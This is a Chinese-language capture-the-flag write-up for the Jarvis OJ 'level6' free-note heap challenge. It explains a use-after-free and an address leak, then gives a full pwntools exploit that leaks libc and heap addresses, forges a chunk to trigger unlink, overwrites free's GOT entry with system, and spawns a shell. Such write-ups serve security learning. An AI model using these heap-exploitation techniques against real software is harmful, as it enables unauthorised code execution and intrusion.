Jarvis OJ PWN level6 WriteUp

终于做完了自己在pwn方向的第一道堆题，参考了writeup1和writeup2怼了四天，终于理解了整道题目，本地调通了，但是题目服务器貌似有点问题，题目提供的libc偏移对不上，远程没有调通

整体思路

1. 泄露出libc的基址和heap的地址
2. 根据泄露的libc基址算出system函数的基址
3. 伪造chunk，free掉伪造的chunk触发unlink，使得可以任意地址写
4. 劫持got表中的free为system函数地址，调用删除功能，getshell

具体分析

首先查看程序功能：

== Blue-lotus Free Note ==
1. List Note
2. New Note
3. Edit Note
4. Delete Note
5. Exit
====================
Your choice:

再拖入IDA看一下逻辑。找到可以利用的地方：

1. 程序一开始malloc一个3096大小的堆用来管理之后创建的note
2. delete功能在free之后没有将指针置空，可以进行利用
3. 在new note的时候，尾部没有加上\x00，可以用来进行地址泄露
4. 在new note的时候，有逻辑判断让malloc的chunk至少为136大小，属于small chunk的范畴，可以使用unlink

地址泄露

libc地址泄露的具体原理为：

1. 由于在写入的时候没有加上\x00，所以在输出的时候可以也一直输出到之后的\x00为止。
2. 当chunk被free掉后fd和bk指针会的值为，而与libc加载地址的相对偏移是固定的。所以只需要泄露出，再在本地调试找到算出libc和main_arena的偏移，便能知道libc的基址
3. 最终操作为：创建两个note(chunk)(防止top chunk的合并)=>free掉第一个=>再创建note(这时候申请的chunk的大小要与free掉的一致才能申请到原来的空间，且输入的大小不能超过四个字节，否则会覆盖地址信息)=>list note拿到地址信息

heap地址泄露的原理为：当两个不相邻的chunk被free掉时，会至于bin的链表中，本例中会先放到unsorted bin中，这时chunk的fd和bk中存有chunk的地址信息，接下来操作同上文则可泄露heap地址。

unlink

程序在最开始的时候，申请了一个堆作为note的管理，可以看到里面存储了note的地址，所以通过unlink伪造chunk的方式可以取得该区的控制权，从而能任意地址写，劫持got表。需要注意的是伪造chunk的大小要地址对齐。

exp

from pwn import *

context.log_level = 'debug'
#p = process('./freenote_x86')
#libc = ELF('./libc-2.19.so')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
elf = ELF('./freenote_x86')
p = remote('pwn2.jarvisoj.com',9885)
def newNote(length, content):
    p.recvuntil('Your choice: ')
    p.sendline('2')
    p.recvuntil('Length of new note: ')
    p.sendline(str(length))
    p.recvuntil('Enter your note: ')
    p.send(content)
    sleep(0.2)

def deleteNote(number):
    p.recvuntil('Your choice: ')
    p.sendline('4')
    p.recvuntil('Note number: ')
    p.sendline(str(number))

def editNote(number, length, content):
    p.recvuntil('Your choice: ')
    p.sendline('3')
    p.recvuntil('Note number: ')
    p.sendline(str(number))
    p.recvuntil('Length of note: ')
    p.sendline(str(length))
    p.recvuntil('Enter your note: ')
    p.sendline(content)

def listNote():
    p.recvuntil('Your choice: ')
    p.sendline('1')

if __name__ == '__main__':
# ======================================== leak libc address
    offset = 0x1b27b0 # main to libc
    newNote(7,'a'*7) # 0
    sleep(0.2)
    newNote(7,'b'*7) # 1
    sleep(0.2)
    deleteNote(0)
    newNote(1,'0')
    listNote()
    sleep(0.2)
    p.recv(7)
    main_addr = u32(p.recv(4))
    libc_addr = main_addr - offset
    system_addr = libc_addr + libc.symbols['system']
    print 'leak address:%x'%main_addr
    print 'libc address:%x'%libc_addr
# ========================================= leak heap address
    newNote(7,'c'*7) # 2
    newNote(7,'d'*7) # 3

    deleteNote(0)
    deleteNote(2)
    newNote(1,'0')
    listNote()
    sleep(0.2)
    p.recv(7)
    heap_base = u32(p.recv(4))-0xd28
    print 'heap address:%x'%heap_base
    deleteNote(0)
    deleteNote(1)
    deleteNote(3)
# ========================================= unlink
    payload = p32(0)+p32(0x81)+p32(heap_base+0x18-12)+p32(heap_base+0x18-8)# fakechunk1: prev_size size fd bk fill_data 0x88
    payload = payload.ljust(0x80,'a') 
    payload += p32(0x80)+p32(0x80) # fakechunk2: prev_size size fd-data 
    payload = payload.ljust(0x80*2,'a')
    newNote(len(payload),payload)
    sleep(0.2)
    deleteNote(1)
# ========================================= hijack got
    payload2 = p32(2)+p32(1)+p32(4)+p32(elf.got['free'])+p32(1)+p32(8)+p32(heap_base+0xca8)
    payload2 = payload2.ljust(0x80*2,'\x00')
    editNote(0,len(payload2),payload2)
    editNote(0,4,p32(system_addr))
    editNote(1,8,'/bin/sh\x00')
    print 'system address:%x'%system_addr
    # gdb.attach(p)
    deleteNote(1)
    p.interactive()